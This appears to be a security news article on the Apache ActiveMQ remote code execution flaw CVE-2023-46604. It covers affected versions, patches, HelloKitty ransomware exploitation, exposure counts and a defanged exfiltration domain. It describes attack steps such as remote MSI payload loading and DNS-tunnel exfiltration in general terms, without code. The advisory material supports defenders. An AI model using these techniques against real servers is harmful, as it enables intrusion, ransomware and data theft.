Table of Contents
Details about the Apache ActiveMQ Vulnerability
The cybersecurity community is raising an alarm about a critical security flaw in the open-source message broker service, Apache ActiveMQ. The flaw, designated CVE-2023-46604, falls under the category of a remote code execution vulnerability. The vulnerability enables a threat actor with network access to the service to run arbitrary shell commands, giving them a significant launchpad for further exploitation. The bug is of maximum severity, carrying a CVSS rating of 10.0. Affected versions include Apache ActiveMQ 5.18.0 before 5.18.3, 5.17.0 before 5.17.6, 5.16.0 before 5.16.7, and ActiveMQ before 5.15.16. It also affects the Legacy OpenWire Module from versions 5.18.0 to 5.8.0.
Patch Information for the Apache ActiveMQ Vulnerability
In response to the discovery of this critical vulnerability, patches have been released for Apache ActiveMQ. These include versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3, all of which were released late in the previous month. It's crucial for users of the affected ActiveMQ versions and the Legacy OpenWire Module to install these updates as soon as possible to mitigate the potential harm. Network scans for indicators of compromise should also be conducted regularly in light of this vulnerability.
Exploitation of Apache ActiveMQ Vulnerability by Cybercriminals
The cybercriminals exploiting the vulnerability have been linked to the HelloKitty ransomware family due to the evidence available and the tone of the ransom note. Successful exploitation typically followed by the adversary attempting to load remote binaries named M2.png and M4.png using the Windows Installer. Both MSI files contain a 32-bit .NET executable named dllloader that loads a Base64-encoded payload named EncDLL that mimics ransomware. It searches for and terminates a particular set of processes before initiating the encryption process and appending the encrypted files with the ".locked" extension.
Rapid7’s Observations on Exploitation of Apache ActiveMQ Vulnerability
Rapid7, a renowned cybersecurity firm, started detecting suspected exploitation attempts of the Apache ActiveMQ CVE-2023-46604 in two different customer environments on October 27, the same day the vulnerability details were disclosed to the public. In both cases, the adversaries attempted to deploy ransomware binaries on the targeted systems in an effort to hold the victim organizations to ransom. Rapid7's team tied the observed activity to the HelloKitty ransomware family, a conclusion drawn based on the available evidence and the content of the ransom note. Rapid7 also pointed out that the affected customer environments were running outdated versions of Apache ActiveMQ, emphasizing the importance of updates following the disclosure of a vulnerability.
Shadowserver Foundation’s Report on Apache ActiveMQ Vulnerability
In a separate report, the Shadowserver Foundation observed over 7,000 internet-exposed ActiveMQ instances. Out of these instances, approximately 3,300 were vulnerable to attacks exploiting the CVE-2023-46604 vulnerability as of November 1, 2023. A significant proportion of these vulnerable servers were found located in China, the U.S., Germany, South Korea, and India. These findings underscore the far-reaching implications of this critical vulnerability, affecting a large number of servers across different locations worldwide.
Technical Details and Availability of Proof of Concept
Further increasing the potential threat associated with the Apache ActiveMQ vulnerability is the public availability of detailed information and a Proof of Concept (PoC) exploit code. This means that other emerging threat groups and individual hackers can easily access this information and potentially plan and execute similar exploitation attempts. The insecure deserialization root cause of the vulnerability allows attackers to craft a specific kind of request that results in the execution of arbitrary shell commands.
Additionally, evidence has been observed of information stealers functioning alongside the ransomware attempts. Exploit attempts involving a callback URL that contained the domain 1ma[.]xyz have been detected. These attempts result in exfiltration of information from the server via HTTP POST requests or DNS tunneling, sending sensitive contents of the server, and environment variable names and their respective values, to a C2 domain.
Previous Exploits with Apache ActiveMQ
The recent Apache ActiveMQ CVE-2023-46604 vulnerability incident is not the first time this popular open-source message broker service has been targeted by cyber attackers. One notable example of a previously exploited vulnerability in Apache ActiveMQ is CVE-2016-3088. This particular vulnerability allowed remote attackers to upload and execute arbitrary files, thereby posing a substantial risk to the security and integrity of the affected systems. The continuous instances of exploits spotlight the attractiveness of Apache ActiveMQ vulnerabilities to malicious actors and the importance of regular updates and security monitoring of these systems.
